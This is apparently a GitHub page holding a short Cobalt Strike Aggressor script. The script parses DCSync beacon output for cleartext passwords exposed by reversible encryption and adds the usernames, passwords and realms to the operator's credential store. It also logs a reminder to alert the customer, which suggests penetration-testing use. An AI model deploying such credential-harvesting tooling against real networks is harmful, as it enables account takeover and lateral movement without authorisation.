-
Notifications
You must be signed in to change notification settings - Fork 1
/
importRevEncrypt.cna
32 lines (22 loc) · 1.03 KB
/
importRevEncrypt.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
##############################
#
# Adds plain text credentials found through DCSync when
# the Reversible Encryption option is use in either the
# user's account properties or is set in Group Policy.
#
##############################
on beacon_output {
if ("* Primary:CLEARTEXT *" isin $2){
$startPassword = find($2,"Primary:CLEARTEXT",0) + 24;
$pass = substr($2,$startPassword);
$startUser = find($2,"SAM Username : ",0) + strlen("SAM Username : ");
$endUser = find($2,"User Principal Name :");
$user = substr($2,$startUser, $endUser);
$startRealm = find($2,"User Principal Name : ",0) + strlen("User Principal Name : ");
$endRealm = find($2, "Account Type : ");
$realm = substr($2,$startRealm,$endRealm);
$realm = split('@',$realm)[1];
credential_add($user,$pass,$realm,"PLAIN TEXT - INSECURE CONFIGURATION!", beacon_info($1,"internal"));
blog($1, "\c4\U The \"Store password using reversible encrypton\" option has been detected. Bring this to the customers attetion immediately!")
}
}